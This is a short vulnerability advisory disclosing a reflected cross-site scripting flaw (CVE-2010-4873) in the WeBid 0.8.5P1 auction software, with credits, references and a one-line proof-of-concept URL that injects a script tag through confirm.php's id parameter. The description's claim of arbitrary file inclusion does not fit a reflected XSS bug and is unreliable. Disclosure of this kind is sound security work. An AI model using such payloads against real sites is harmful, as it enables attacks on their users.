Bug: WeBid 0.8.5P1 cross site scripting vulnerability (WLB-2010110037 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: WeBid 0.8.5P1 cross site scripting vulnerability
 Credit: John Leitch
 Date: 2010.11.09
 CWE: CWE-79 (Show similar)
 CVE: CVE-2010-4873 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
Low
No
Yes

------------------------------------------------------------------------
Software................WeBid 0.8.5P1
Vulnerability...........Reflected Cross-site Scripting
Download................http://www.webidsupport.com/
Release Date............11/8/2010
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://www.johnleitch.net/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------

--Description--

A reflected cross-site scripting vulnerability in WeBid 0.8.5P1 can be
exploited to include arbitrary files.


--PoC--

http://localhost/webid/confirm.php?id=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

References:

http://xforce.iss.net/xforce/xfdb/63152
http://www.securityfocus.com/bid/44765
http://www.johnleitch.net/Vulnerabilities/WeBid.0.8.5P1.Reflected.Cross-site.Scripting/62
http://secunia.com/advisories/42171
http://packetstormsecurity.org/1011-exploits/webid085p1-xss.txt
http://osvdb.org/69103

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com